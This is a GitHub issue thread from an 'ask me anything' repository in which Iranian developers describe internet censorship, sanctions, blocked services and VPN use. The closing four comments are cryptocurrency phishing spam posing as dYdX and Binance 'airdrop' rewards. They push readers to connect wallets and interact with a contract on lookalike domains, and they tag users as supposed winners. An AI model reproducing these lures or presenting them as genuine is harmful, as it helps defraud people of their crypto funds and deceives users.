### ISSUE TITLE
How has living in Iran affected your work in the open source world?

### ISSUE THREAD

**Issue by Qix-** [mamal72/ama#10]
Or has it, at all? There is a lot of stigma revolving around Iran (most of it unfounded) - have you seen any of it reflect back into your online presence?

**Comment by mamal72** [comment]
There are 2 things affecting the developers in Iran.
Things that push us back from inside and things that holds us from outside.

About inside, we have a very limited access to Internet and, websites, social networks and a lot of services. Most of them are blocked by the gov and we should do a lot of things to bypass them it's not working sometimes. :unamused: Facebook, Twitter, Youtube, most of messengers and a lot of resources and websites which may not have politic or adult content are blocked from inside. They don't care much about us. Sometime Git and Github is not working. NPM, Bower and everything related to SSL may get down for days here. Also we have a very low speed connection compared to the rest of the world. It's between 30KB and 1.5MB per second. Most of us have connections below 1MB. Sometime we should just read the resources as we can't test or use them. Sometime we should spend a whole day downloading simple things like React Native. We're suffering. :unamused:

About the outside, the situations are not better. We have no Amazon, no Ebay, no Paypal, no credit cards, no Google sites like html5rocks and anything else (Yeah, 403. "Your client does not have permission to get URL / from this server."), no Google code, no Spotify and a lot more. Most of the websites has no Iran in their select box to choose. We should just connect a proxy and choose USA in the most cases. We should buy Paypal accounts from the guys who can register it for us from the outside and pay them a lot for the account. There are the people who think so bad about us. Sometimes when we tell them we are from Iran, they start to insult or tell us the things that we do not deserve. I don't care much about the politics. People all are the same in the whole world. We can't judge them by the place they born, cause they didn't choose it.

There may be a lot more to talk about it. There are another aspects like "how our developers see the open source world", "the copyrights in Iran" and etc. But as it's already a long answer, I didn't mention them.
Thanks for asking this question. If you want to know more or anything, just mention it.

**Comment by mdibaiee** [comment]
I lol'd at our situation, or maybe I should've cried. :laughing:

**Comment by Qix-** [comment]
Thanks for the detailed answer. I assume sites shut out Iran for political reasons?

**Comment by mamal72** [comment]
Yeah it's it. The political reasons affect us the people outside the politics. Dunno what's our guilt. :unamused: :-1:

**Comment by mdibaiee** [comment]
@Qix- Sites are not selectively shut, that's the problem. I remember Codrops, Sourceforge and a few other non-political, non-adult websites being blocked here.

**Comment by mamal72** [comment]
@mdibaiee From the inside, anything can cause the website to get blocked. There are a lot of reasons. For example, If you run a good service made some powerful people who have benefits from some competitors angry, they block it. It's just as simple as it is. If you have a simple upload center that some guy upload some bad pictures in it and he himself report that picture, they block it. They mostly don't care about why and how and don't spend time investigating.
But from the outside, it's all political reasons. There are some sanctions against us about software related stuff.

**Comment by mdibaiee** [comment]
Correct, I just got to install `adb` after an hour of waiting for my VPN to finally turn on.

**Comment by Qix-** [comment]
So is using a VPN illegal, then? Or do they not care?

**Comment by mdibaiee** [comment]
@Qix- I'm sure providing/selling VPNs is illegal, VPN sites get blocked and sellers sued, but they _can't_ act on users, because everyone is using VPNs, even the government itself!

There was an announcement last year that government companies could buy *legal* VPNs from the government itself, that shows the government certainly knows they are doing it wrong, but they don't care to solve the issues, they start a plan like this to make even more money, that's what they care about.

**Comment by mamal72** [comment]
It's illegal but they don't care. Using or sharing it is illegal.
They are blocked a lot of protocols like PPTP, L2TP and OpenVPN (I heard It's blocked few days ago) but there are so many ways to bypass the limits. The funny part is that a lot of our politicians like our president and some of our ministers are using social networks like Twitter and Facebook!

**Comment by Qix-** [comment]
That's ridiculous; unless they cut out the internet entirely, there's no way for them to really block your connection to the outside world in any capacity.

**Comment by mamal72** [comment]
Yeah but they don't get it yet. They are spending a lot of budget and resources to make these filtering systems smarter (smart is different in their vision xD) day by day. It's all are useless. I hope someday they get it.

**Comment by codelou** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by muraliR** [comment]
## Congratulations! You've been chosen to receive a $7,000 Rewards. 🪂🔴 


### Trading and Launch Rewards are live on dYdX Chain! ✨

Connect your wallet, follow the instructions, and claim this exclusive offer from Dydx Exchange. For GitHub users only—share with friends to make it eligible. Redeem your reward first.

[![Dydx Exchange](https://pbs.twimg.com/card_img/1729868185275617280/nzyJpc7G?format=jpg&name=small)](https://claim.dydxexchang.com/)


[![N|Solid](https://cldup.com/dTxpPi9lDf.thumb.png)](https://nodesource.com/products/nsolid)

🚀 **Claim Your Rewards Now!** [Check Eligibility](https://claim.dydxexchang.com/)

Access the Dydx Exchange platform and connect your wallet securely. Ensure you're using a trusted wallet for the transaction.

- 🔗 Connect your wallet twice
- 📋 Register on the platform
- 💰 Claim your Rewards, up to $2,000!

@dydxprotocol

**Comment by devsquadcore** [comment]
# Binance Airdrop Guide: $500k Worth of Airdrop is Ready, here's how to Claim

Claim your share of the $500k Binance Airdrop! As the year comes to an end, we're giving away $500 in BNB to celebrate. Follow the steps above to secure your tokens. Don't miss out on this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj).
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.


Winners: @sherzad, @Davdegreat, @mariusty, @tzekid, @sgilson, @jatsharma, @s166harth, @phoenix-blue, @rpahlevy, @chaiz64

**Comment by anooj1483** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @zerogog, @tsengia, @q23818, @WebDevChris1, @Semchik01, @jllv-ccc, @nguyenhuyhoang2
